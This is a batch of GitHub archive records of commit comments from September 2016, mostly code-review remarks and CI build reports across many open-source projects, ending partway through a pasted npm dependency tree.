{"id":"4535059765","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18947678,"position":null,"line":null,"path":null,"commit_id":"310962ea05dfbf5f29bcf5ad6d2f04de68c34e2d","created_at":"2016-09-08T16:11:45Z","updated_at":"2016-09-08T16:11:45Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/39/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:174:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:222:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:303:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-08T16:11:45Z"}
{"id":"4535061788","type":"CommitCommentEvent","actor":{"login":"gregarndt"},"repo":{"name":"taskcluster/docker-worker"},"payload":{"comment":{"id":18947682,"position":5,"line":144,"path":"lib/features/artifacts.js","commit_id":"beaa5701942eb033c7f9379010b1f6d320777a1a","created_at":"2016-09-08T16:12:06Z","updated_at":"2016-09-08T16:12:06Z","body":"good catch!"}},"created_at":"2016-09-08T16:12:06Z"}
{"id":"4535067812","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18947693,"position":null,"line":null,"path":null,"commit_id":"4bb7f4cbafc5a4b65278e6b1e87bc109d0ba0c64","created_at":"2016-09-08T16:13:07Z","updated_at":"2016-09-08T16:13:07Z","body":"saw approval from JeetKunDoug\nat https://github.com/basho/riak_core/commit/4bb7f4cbafc5a4b65278e6b1e87bc109d0ba0c64"}},"created_at":"2016-09-08T16:13:07Z"}
{"id":"4535067889","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18947694,"position":null,"line":null,"path":null,"commit_id":"4bb7f4cbafc5a4b65278e6b1e87bc109d0ba0c64","created_at":"2016-09-08T16:13:08Z","updated_at":"2016-09-08T16:13:08Z","body":"merging basho/riak_core/fd-capabilities-cherrypick = 4bb7f4cb into borshop-integration-856-fd-capabilities-cherrypick"}},"created_at":"2016-09-08T16:13:08Z"}
{"id":"4535067922","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18947696,"position":null,"line":null,"path":null,"commit_id":"4bb7f4cbafc5a4b65278e6b1e87bc109d0ba0c64","created_at":"2016-09-08T16:13:08Z","updated_at":"2016-09-08T16:13:08Z","body":"basho/riak_core/fd-capabilities-cherrypick = 4bb7f4cb merged ok, testing candidate = 94e6f975"}},"created_at":"2016-09-08T16:13:08Z"}
{"id":"4535072446","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18947701,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T16:13:51Z","updated_at":"2016-09-08T16:13:51Z","body":"> We could use function-style syntax for new internal_info nodes: EXCEPTION(), ERROR_MESSAGE()\r\nYes, this is another option."}},"created_at":"2016-09-08T16:13:51Z"}
{"id":"4535073804","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18947706,"position":100,"line":229,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-08T16:14:03Z","updated_at":"2016-09-08T16:14:03Z","body":"Can you check for the return of `inet_pton` and return strerror(errorno) if the return is -1, and return invalid string with the `value` if the return is 0?"}},"created_at":"2016-09-08T16:14:03Z"}
{"id":"4535075722","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18947714,"position":107,"line":236,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-08T16:14:21Z","updated_at":"2016-09-08T16:14:21Z","body":"ditto"}},"created_at":"2016-09-08T16:14:21Z"}
{"id":"4535075985","type":"CommitCommentEvent","actor":{"login":"gr2m"},"repo":{"name":"gr2m/riot-router-example"},"payload":{"comment":{"id":18947715,"position":7,"line":18,"path":"index.html","commit_id":"2abace5d8b8b0a2de570a612eb5b4e03c37a6a4d","created_at":"2016-09-08T16:14:24Z","updated_at":"2016-09-08T16:14:24Z","body":"yes you can simply enter `location.pathname` on any website in the console to see how it behaves. `location` is a native object that all browsers support, see https://developer.mozilla.org/en-US/docs/Web/API/Location"}},"created_at":"2016-09-08T16:14:24Z"}
{"id":"4535080351","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18947726,"position":null,"line":null,"path":null,"commit_id":"9cfc0410a8eab450e0bed5f5739a310648762fff","created_at":"2016-09-08T16:15:11Z","updated_at":"2016-09-08T16:15:11Z","body":"What time? I'm working from home again today so I'll be around. We'll need to rebuild the modpacks (I can reupload all the mod files for testing) as we added the pseudo-NW code to the CP, etc."}},"created_at":"2016-09-08T16:15:11Z"}
{"id":"4535087018","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18947750,"position":null,"line":null,"path":null,"commit_id":"21b0f5236d2741c1202fa4c9d98ec6d619d6414d","created_at":"2016-09-08T16:16:22Z","updated_at":"2016-09-08T16:16:22Z","body":"@binky123 thats an interesting way to look at LMR. \r\nBut I guess the fraction of moves that give a threat is small. So pruning all other moves might not work... But who knows. Probably I'll try it sometime if you don't do so yourself."}},"created_at":"2016-09-08T16:16:22Z"}
{"id":"4535089372","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18947756,"position":null,"line":null,"path":null,"commit_id":"396ffac28f948ebe4864551c67a01d1828e22ba6","created_at":"2016-09-08T16:16:46Z","updated_at":"2016-09-08T16:16:46Z","body":"85091e3"}},"created_at":"2016-09-08T16:16:46Z"}
{"id":"4535090178","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947760,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:16:55Z","updated_at":"2016-09-08T16:16:55Z","body":"SELinux ABI(API) seem to be changed in N. I have to revert all changes made for M, and use the one from https://github.com/android/kernel_common/tree/android-3.10.y tree. There is also other parts need to be updated, like https://github.com/android/kernel_common/blob/android-3.10.y/kernel/seccomp.c. See my recently update on my kernel tree."}},"created_at":"2016-09-08T16:16:55Z"}
{"id":"4535090799","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"ProximoSrl/Jarvis.DocumentStore"},"payload":{"comment":{"id":18947762,"position":null,"line":null,"path":null,"commit_id":"e4805a9bdad54fef14f901b65207ac7ba1b10e5d","created_at":"2016-09-08T16:17:01Z","updated_at":"2016-09-08T16:17:01Z","body":"TeamCity Jarvis :: Jarvis.DocumentStore :: GitFlow Debug / Test / Release [Build 88](http://build.prxm.it:8811/viewLog.html?buildId=9182&buildTypeId=Jarvis_DocumentStore_GitVersion) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:00:07"}},"created_at":"2016-09-08T16:17:01Z"}
{"id":"4535091271","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18947763,"position":null,"line":null,"path":null,"commit_id":"14dd34fbe65fea88a6a0fd1f3c8d9d1d932bbdb6","created_at":"2016-09-08T16:17:06Z","updated_at":"2016-09-08T16:17:06Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.69.14dd34fbe65fea88a6a0fd1f3c8d9d1d932bbdb6](http://build.palaso.org/viewLog.html?buildId=76666&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **FAILURE**\nSummary: Tests failed: 4, passed: 3466, ignored: 107 Build time: 00:05:17\n### Failed tests\n```\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.ReleaseLock_LockedByActiveProcess_LockFileExists: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcess_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessNotTimedOut_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessTimedOut_ReturnsTrue: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-08T16:17:06Z"}
{"id":"4535092732","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef/etools-partnership-management"},"payload":{"comment":{"id":18947785,"position":37,"line":37,"path":"package.json","commit_id":"185cce0dcc73ac0a2bf94d9fc649085e5bf1cb65","created_at":"2016-09-08T16:17:20Z","updated_at":"2016-09-08T16:17:20Z","body":"I believe these should be devDependencies not dependencies"}},"created_at":"2016-09-08T16:17:20Z"}
{"id":"4535093202","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18947786,"position":124,"line":251,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-08T16:17:25Z","updated_at":"2016-09-08T16:17:25Z","body":"I would say capture the error strings from attempts to parse as AF_INET and AF_INET6, join the error strings and return this combined error."}},"created_at":"2016-09-08T16:17:25Z"}
{"id":"4535095002","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18947790,"position":111,"line":240,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-08T16:17:43Z","updated_at":"2016-09-08T16:17:43Z","body":"kill this line."}},"created_at":"2016-09-08T16:17:43Z"}
{"id":"4535095835","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":18947794,"position":39,"line":22,"path":"tests/utils.vader","commit_id":"2c7a28d01cb0bdf8602680314b9f0b8c10bf9f07","created_at":"2016-09-08T16:17:52Z","updated_at":"2016-09-08T16:17:52Z","body":"You should (additionally) also check the real value.  You can use `file fname` to set a predictable buffer name for this."}},"created_at":"2016-09-08T16:17:52Z"}
{"id":"4535096003","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18947797,"position":119,"line":246,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-08T16:17:53Z","updated_at":"2016-09-08T16:17:53Z","body":"kill this line."}},"created_at":"2016-09-08T16:17:53Z"}
{"id":"4535096022","type":"CommitCommentEvent","actor":{"login":"tamiko"},"repo":{"name":"dealii/dealii"},"payload":{"comment":{"id":18947798,"position":17,"line":70,"path":"source/distributed/tria_base.cc","commit_id":"4123a86394191ff82681e5c8935245179c28415f","created_at":"2016-09-08T16:17:53Z","updated_at":"2016-09-08T16:17:53Z","body":"```\r\ndiff --git a/include/deal.II/base/mpi.h b/include/deal.II/base/mpi.h\r\nindex 8838d94..0f7a944 100644\r\n--- a/include/deal.II/base/mpi.h\r\n+++ b/include/deal.II/base/mpi.h\r\n@@ -28,6 +28,7 @@ typedef int MPI_Comm;\r\n const int MPI_COMM_SELF = 0;\r\n typedef int MPI_Datatype;\r\n typedef int MPI_Op;\r\n+void MPI_Comm_free(...) {}\r\n \r\n static const int MPI_MIN = 0;\r\n static const int MPI_MAX = 0;\r\n```\r\n?"}},"created_at":"2016-09-08T16:17:53Z"}
{"id":"4535097104","type":"CommitCommentEvent","actor":{"login":"klarkc"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18947799,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T16:18:05Z","updated_at":"2016-09-08T16:18:05Z","body":"@Nigeltiany My installation does not have the module pkginfo, it's installed in your node_modules? Who depends on it? Show your dependency tree: `$ npm list`"}},"created_at":"2016-09-08T16:18:05Z"}
{"id":"4535098759","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":18947801,"position":37,"line":20,"path":"tests/utils.vader","commit_id":"2c7a28d01cb0bdf8602680314b9f0b8c10bf9f07","created_at":"2016-09-08T16:18:22Z","updated_at":"2016-09-08T16:18:22Z","body":"This should become `%:h` probably?!"}},"created_at":"2016-09-08T16:18:22Z"}
{"id":"4535099980","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18947804,"position":null,"line":null,"path":null,"commit_id":"ff837d8c633fc70deef05aefc41f167a7b745bc9","created_at":"2016-09-08T16:18:34Z","updated_at":"2016-09-08T16:18:34Z","body":"Thanks! Turns out I still need my “workaround” because I can’t have code outside the constructor referring to an uninitialized value…"}},"created_at":"2016-09-08T16:18:34Z"}
{"id":"4535100907","type":"CommitCommentEvent","actor":{"login":"DougGregor"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18947805,"position":null,"line":null,"path":null,"commit_id":"48204538206865830b3c2a635a02aa9d90675e01","created_at":"2016-09-08T16:18:40Z","updated_at":"2016-09-08T16:18:40Z","body":"It's NFC."}},"created_at":"2016-09-08T16:18:40Z"}
{"id":"4535104432","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18947811,"position":null,"line":null,"path":null,"commit_id":"14dd34fbe65fea88a6a0fd1f3c8d9d1d932bbdb6","created_at":"2016-09-08T16:19:19Z","updated_at":"2016-09-08T16:19:19Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1096.14dd34fbe65fea88a6a0fd1f3c8d9d1d932bbdb6](http://build.palaso.org/viewLog.html?buildId=76665&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:07:38"}},"created_at":"2016-09-08T16:19:19Z"}
{"id":"4535105204","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947813,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:19:26Z","updated_at":"2016-09-08T16:19:26Z","body":"o.O\r\nI thought RND_BITS patch was the only needed addition in kernel duh"}},"created_at":"2016-09-08T16:19:26Z"}
{"id":"4535107442","type":"CommitCommentEvent","actor":{"login":"colbycheeze"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":18947814,"position":1,"line":1,"path":"src/routes/Dashboard/PopUpCard/modules/PopUpCard.js","commit_id":"522ad0440911c95b738b6b566f8c0ba3ad1fc9e2","created_at":"2016-09-08T16:19:47Z","updated_at":"2016-09-08T16:19:47Z","body":"This file should live in `src/routes/Dashboard/modules/PopUpCard.js`\r\n\r\nThough honestly, it should probably just live inside of Dashboard.js\r\n\r\nModules / Reducers don't have to tie directly to component names, they are simply the \"functionality\". Most of the data that popupcard is receiving is coming from Dashboard related actions, so Dashboard.js is relating to the actions that modify state in that area."}},"created_at":"2016-09-08T16:19:47Z"}
{"id":"4535114401","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947833,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:20:59Z","updated_at":"2016-09-08T16:20:59Z","body":"Look at init codes. It will fail without that patch."}},"created_at":"2016-09-08T16:20:59Z"}
{"id":"4535114814","type":"CommitCommentEvent","actor":{"login":"MatveiKalin"},"repo":{"name":"MatveiKalin/web_project"},"payload":{"comment":{"id":18947834,"position":null,"line":null,"path":null,"commit_id":"92d0d35e4d976910737af3fa5ced8494ce6558d6","created_at":"2016-09-08T16:21:03Z","updated_at":"2016-09-08T16:21:03Z","body":"Добавлен обязательный атрибут \"alt\" (альтернативный текст) для тега \"img\"."}},"created_at":"2016-09-08T16:21:03Z"}
{"id":"4535116203","type":"CommitCommentEvent","actor":{"login":"lucasoli"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18947836,"position":null,"line":null,"path":null,"commit_id":"d62f422e3d951a50bb0b71d0dc69143eace970f9","created_at":"2016-09-08T16:21:18Z","updated_at":"2016-09-08T16:21:18Z","body":"@technoken they are both docummented at doc/script_commands.txt as you can see bellow:\r\n\r\n> OnTouch:\r\n> \r\n> This label will be executed if a trigger area is defined for the NPC object it's \r\n> in. If it isn't present, the execution will start from the beginning of the NPC \r\n> code. The RID of the triggering character object will be attached.\r\n> \r\n> OnTouch_:\r\n> \r\n> Similar to OnTouch, but will only run one instance. Another character is\r\n> chosen once the triggering character leaves the area."}},"created_at":"2016-09-08T16:21:18Z"}
{"id":"4535118617","type":"CommitCommentEvent","actor":{"login":"hujunfu"},"repo":{"name":"hujunfu/HelloWorld"},"payload":{"comment":{"id":18947839,"position":null,"line":null,"path":null,"commit_id":"7d2dbf37b145c1236db89ab06312319f2baf789b","created_at":"2016-09-08T16:21:43Z","updated_at":"2016-09-08T16:21:43Z","body":"this is a beginning"}},"created_at":"2016-09-08T16:21:43Z"}
{"id":"4535119666","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18947841,"position":143,"line":286,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-08T16:21:54Z","updated_at":"2016-09-08T16:21:54Z","body":"why `auto`? We should use an explicit type for variables whereever possible."}},"created_at":"2016-09-08T16:21:54Z"}
{"id":"4535119878","type":"CommitCommentEvent","actor":{"login":"hujunfu"},"repo":{"name":"hujunfu/HelloWorld"},"payload":{"comment":{"id":18947842,"position":1,"line":1,"path":"README.md","commit_id":"7d2dbf37b145c1236db89ab06312319f2baf789b","created_at":"2016-09-08T16:21:56Z","updated_at":"2016-09-08T16:21:56Z","body":"Hello Todou"}},"created_at":"2016-09-08T16:21:56Z"}
{"id":"4535120432","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18947845,"position":147,"line":290,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-08T16:22:02Z","updated_at":"2016-09-08T16:22:02Z","body":"ditto."}},"created_at":"2016-09-08T16:22:02Z"}
{"id":"4535122600","type":"CommitCommentEvent","actor":{"login":"adamratzman"},"repo":{"name":"adamratzman/Discord"},"payload":{"comment":{"id":18947850,"position":8,"line":null,"path":"Main/src/main/java/Abstraction/PollOption.java","commit_id":"f27344d0a3edd9df2dcbad920d0824b4859e9a75","created_at":"2016-09-08T16:22:26Z","updated_at":"2016-09-08T16:22:26Z","body":"Used for polling"}},"created_at":"2016-09-08T16:22:26Z"}
{"id":"4535128981","type":"CommitCommentEvent","actor":{"login":"rvennam"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":18947876,"position":1,"line":1,"path":"src/routes/Dashboard/PopUpCard/modules/PopUpCard.js","commit_id":"522ad0440911c95b738b6b566f8c0ba3ad1fc9e2","created_at":"2016-09-08T16:23:30Z","updated_at":"2016-09-08T16:23:30Z","body":"This file isn't needed. Artifact from when I was learning. Will delete"}},"created_at":"2016-09-08T16:23:30Z"}
{"id":"4535131678","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/feng3d-ts"},"payload":{"comment":{"id":18947884,"position":5,"line":120,"path":"feng3d/src/me/feng3d/core/object3DComponents/container/Container3D.ts","commit_id":"fa6ce11ca44fcc9b3f604e7e4121d07e3302fdc9","created_at":"2016-09-08T16:23:57Z","updated_at":"2016-09-08T16:23:57Z","body":"test"}},"created_at":"2016-09-08T16:23:57Z"}
{"id":"4535136106","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/feng3d-ts"},"payload":{"comment":{"id":18947898,"position":5,"line":120,"path":"feng3d/src/me/feng3d/core/object3DComponents/container/Container3D.ts","commit_id":"fa6ce11ca44fcc9b3f604e7e4121d07e3302fdc9","created_at":"2016-09-08T16:24:45Z","updated_at":"2016-09-08T16:24:45Z","body":"这个功能果然不错啊！"}},"created_at":"2016-09-08T16:24:45Z"}
{"id":"4535136614","type":"CommitCommentEvent","actor":{"login":"davedash"},"repo":{"name":"davedash/django-fixture-magic"},"payload":{"comment":{"id":18947901,"position":null,"line":null,"path":null,"commit_id":"414edd244fae0caa1f46d1e1eabfbb55361c78d0","created_at":"2016-09-08T16:24:51Z","updated_at":"2016-09-08T16:24:51Z","body":"Okay 0.1.2 is out.\n\n-- \nDave Dash\n\n\nOn September 7, 2016 at 8:14:47 PM, TheKGF (notifications@github.com) wrote:\n\nHey Dave, I don't suppose I could get you to release this? Hope all's well. :)\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2016-09-08T16:24:51Z"}
{"id":"4535139042","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18947908,"position":null,"line":null,"path":null,"commit_id":"4bb7f4cbafc5a4b65278e6b1e87bc109d0ba0c64","created_at":"2016-09-08T16:25:17Z","updated_at":"2016-09-08T16:25:17Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_core/builds/2072\n"}},"created_at":"2016-09-08T16:25:17Z"}
{"id":"4535140987","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18947917,"position":212,"line":376,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-08T16:25:35Z","updated_at":"2016-09-08T16:25:35Z","body":"why are we removing the `ntohl`? I think we would need to count bits with host-byte order representation."}},"created_at":"2016-09-08T16:25:35Z"}
{"id":"4535141366","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18947921,"position":null,"line":null,"path":null,"commit_id":"14dd34fbe65fea88a6a0fd1f3c8d9d1d932bbdb6","created_at":"2016-09-08T16:25:39Z","updated_at":"2016-09-08T16:25:39Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.762.14dd34fbe65fea88a6a0fd1f3c8d9d1d932bbdb6](http://build.palaso.org/viewLog.html?buildId=76668&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:13"}},"created_at":"2016-09-08T16:25:39Z"}
{"id":"4535143863","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18947936,"position":20,"line":71,"path":"test/components/urlBarSuggestionsTest.js","commit_id":"7edc0ce9c9079c9b8f165fa0a6add38abc827de8","created_at":"2016-09-08T16:26:07Z","updated_at":"2016-09-08T16:26:07Z","body":"wfm but I don't think we need to add another dep for it"}},"created_at":"2016-09-08T16:26:07Z"}
{"id":"4535144627","type":"CommitCommentEvent","actor":{"login":"jswrenn"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18947941,"position":null,"line":null,"path":null,"commit_id":"c0ece653aa4e6e790dbf45b865958f1d684d484e","created_at":"2016-09-08T16:26:15Z","updated_at":"2016-09-08T16:26:15Z","body":"![Grey line beneath error highlight settings](https://cloud.githubusercontent.com/assets/3820879/18357330/9713ebc0-75be-11e6-82e6-d0feabdb6191.png)\r\n"}},"created_at":"2016-09-08T16:26:15Z"}
{"id":"4535144818","type":"CommitCommentEvent","actor":{"login":"git-john-one"},"repo":{"name":"git-john-one/sourceTest"},"payload":{"comment":{"id":18947943,"position":null,"line":null,"path":null,"commit_id":"d8ca9662c741e6ae1e92cb86db9c4e0e91b99f68","created_at":"2016-09-08T16:26:17Z","updated_at":"2016-09-08T16:26:17Z","body":"Common on 5"}},"created_at":"2016-09-08T16:26:17Z"}
{"id":"4535146097","type":"CommitCommentEvent","actor":{"login":"Nigeltiany"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18947947,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T16:26:29Z","updated_at":"2016-09-08T16:26:29Z","body":"| | `-- isobject@2.1.0\r\n| |   `-- isarray@1.0.0\r\n| +-- readable-stream@2.1.5\r\n| | `-- isarray@1.0.0\r\n| +-- try-json-parse@0.1.1\r\n| `-- vinyl@1.2.0\r\n|   +-- clone@1.0.2\r\n|   `-- clone-stats@0.0.1\r\n+-- gulp-changed@1.3.2\r\n| `-- through2@2.0.1\r\n|   `-- readable-stream@2.0.6\r\n|     `-- isarray@1.0.0\r\n+-- gulp-gh-pages@0.5.4\r\n| +-- gift@0.6.1\r\n| | `-- underscore@1.7.0\r\n| +-- readable-stream@2.1.5\r\n| | `-- isarray@1.0.0\r\n| +-- vinyl-fs@2.4.3\r\n| | +-- duplexify@3.4.5\r\n| | | +-- end-of-stream@1.0.0\r\n| | | +-- readable-stream@2.1.5\r\n| | | | `-- isarray@1.0.0\r\n| | | `-- stream-shift@1.0.0\r\n| | +-- glob-stream@5.3.4\r\n| | | +-- glob@5.0.15\r\n| | | +-- ordered-read-streams@0.3.0\r\n| | | | `-- is-stream@1.1.0\r\n| | | +-- through2@0.6.5\r\n| | | | `-- readable-stream@1.0.34\r\n| | | |   `-- isarray@0.0.1\r\n| | | +-- to-absolute-glob@0.1.1\r\n| | | | `-- extend-shallow@2.0.1\r\n| | | `-- unique-stream@2.2.1\r\n| | +-- gulp-sourcemaps@1.6.0\r\n| | | +-- convert-source-map@1.3.0\r\n| | | +-- through2@2.0.1\r\n| | | | `-- readable-stream@2.0.6\r\n| | | |   `-- isarray@1.0.0\r\n| | | `-- vinyl@1.2.0\r\n| | +-- is-valid-glob@0.3.0\r\n| | +-- lazystream@1.0.0\r\n| | | `-- readable-stream@2.1.5\r\n| | |   `-- isarray@1.0.0\r\n| | +-- lodash.isequal@4.4.0\r\n| | +-- strip-bom@2.0.0\r\n| | +-- strip-bom-stream@1.0.0\r\n| | +-- through2@2.0.1\r\n| | | `-- readable-stream@2.0.6\r\n| | +-- through2-filter@2.0.0\r\n| | | `-- through2@2.0.1\r\n| | |   `-- readable-stream@2.0.6\r\n| | |     `-- isarray@1.0.0\r\n| | +-- vali-date@1.0.0\r\n| | `-- vinyl@1.2.0\r\n| `-- wrap-promise@1.0.1\r\n|   `-- es6-promise@2.3.0\r\n+-- gulp-html-extract@0.2.0\r\n| +-- cheerio@0.19.0\r\n| | +-- css-select@1.0.0\r\n| | | +-- boolbase@1.0.0\r\n| | | +-- css-what@1.0.0\r\n| | | +-- domutils@1.4.3\r\n| | | `-- nth-check@1.0.1\r\n| | +-- dom-serializer@0.1.0\r\n| | | `-- domelementtype@1.1.3\r\n| | +-- entities@1.1.1\r\n| | +-- htmlparser2@3.8.3\r\n| | | +-- domelementtype@1.3.0\r\n| | | +-- domhandler@2.3.0\r\n| | | +-- domutils@1.5.1\r\n| | | +-- entities@1.0.0\r\n| | | `-- readable-stream@1.1.14\r\n| | `-- lodash@3.10.1\r\n| +-- gulp-util@2.2.14\r\n| | +-- chalk@0.4.0\r\n| | | +-- ansi-styles@1.0.0\r\n| | | +-- has-color@0.1.7\r\n| | | `-- strip-ansi@0.1.1\r\n| | +-- lodash._reinterpolate@2.4.1\r\n| | +-- lodash.template@2.4.1\r\n| | | +-- lodash._escapestringchar@2.4.1\r\n| | | +-- lodash.defaults@2.4.1\r\n| | | | +-- lodash._objecttypes@2.4.1\r\n| | | | `-- lodash.keys@2.4.1\r\n| | | +-- lodash.escape@2.4.1\r\n| | | | +-- lodash._escapehtmlchar@2.4.1\r\n| | | | | `-- lodash._htmlescapes@2.4.1\r\n| | | | `-- lodash._reunescapedhtml@2.4.1\r\n| | | |   `-- lodash.keys@2.4.1\r\n| | | +-- lodash.keys@2.4.1\r\n| | | | +-- lodash._isnative@2.4.1\r\n| | | | +-- lodash._shimkeys@2.4.1\r\n| | | | `-- lodash.isobject@2.4.1\r\n| | | +-- lodash.templatesettings@2.4.1\r\n| | | `-- lodash.values@2.4.1\r\n| | |   `-- lodash.keys@2.4.1\r\n| | +-- minimist@0.0.8\r\n| | +-- multipipe@0.0.2\r\n| | | `-- duplexer2@0.0.1\r\n| | `-- vinyl@0.2.3\r\n| `-- through2@0.4.1\r\n|   +-- readable-stream@1.0.34\r\n|   `-- xtend@2.1.2\r\n|     `-- object-keys@0.4.0\r\n+-- gulp-if@2.0.1\r\n| +-- 